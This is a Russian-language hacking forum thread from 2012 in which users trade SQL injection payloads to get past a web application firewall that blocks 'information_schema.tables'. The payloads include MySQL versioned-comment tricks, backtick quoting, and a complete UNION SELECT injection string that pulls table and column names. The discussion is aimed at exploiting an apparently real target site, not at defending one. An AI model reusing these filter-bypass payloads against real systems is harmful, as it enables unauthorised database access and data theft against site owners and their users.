HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19231  
Старый 10.01.2012, 17:45
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

[QUOTE="BaleHoK"]
BaleHoK said:
Прежде чем это написать не поленился бы и посмотрел для каких это версий..это было в старых постгрес..если не изменяет память
 
Ответить с цитированием

  #19232  
Старый 11.01.2012, 17:36
Breetonia
Guest
Сообщений: n/a
Провел на форуме:
7749

Репутация: 0
По умолчанию

Удалили ? Кто ? Я это был = ))
 
Ответить с цитированием

  #19233  
Старый 11.01.2012, 18:59
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

/showpost.php?p=2951596&postcount=18
 
Ответить с цитированием

  #19234  
Старый 11.01.2012, 19:01
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от trololoman96  
trololoman96 said:
/showpost.php?p=2951596&postcount=18
У него известно название таблиц, а у меня нет.

information_schema.tables
 
Ответить с цитированием

  #19235  
Старый 11.01.2012, 19:14
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

фильтр на

Цитата:
Сообщение от None  
from information_schema.tables
пробовал по-разному, так и так

/showpost.php?p=2289579&postcount=14623

/showpost.php?p=2386991&postcount=15253

все равно 403

Цитата:
Сообщение от None  
/*!union*/+/*!select*/
с этим все нормально, версию он выводит

и кстати, может быть что запрос режется?
 
Ответить с цитированием

  #19236  
Старый 11.01.2012, 19:34
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Expl0ited, только на information_schema.tables

после того как появляется в запросе — forbidden
 
Ответить с цитированием

  #19237  
Старый 11.01.2012, 19:55
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
Expl0ited
, только на information_schema.tables
после того как появляется в запросе — forbidden
Попробуй такое извращение:

information_schema./**/tables

2trololoman96,

он уже писал, что такие мохинации не сработали...
 
Ответить с цитированием

  #19238  
Старый 11.01.2012, 19:58
trololoman96
Guest
Сообщений: n/a
Провел на форуме:
29020

Репутация: 55
По умолчанию

Цитата:
Сообщение от None  
Expl0ited, только на information_schema.tables
после того как появляется в запросе — forbidden
попробуй полностью запрос в /*!sql*/ взять, типа

Код:
Code:
s.php?id=1+/*!union+select+1,2,3+information_schema.tables*/
 
Ответить с цитированием

  #19239  
Старый 11.01.2012, 23:43
Boolean
Guest
Сообщений: n/a
Провел на форуме:
40748

Репутация: 78
По умолчанию

При таких фильтрах в 80% случаев помогает `.

Код:
Code:
`information_schema`.`tables`
 
Ответить с цитированием

  #19240  
Старый 11.01.2012, 23:45
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Там было всё проще:

Код:
Code:
id=(1)and+false/*!union*//*!select(1),2,unhex(hex(concat_ws(0x3a,table_name,  column_name))),(4)from(information_schema.columns)limit+1*/--+
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ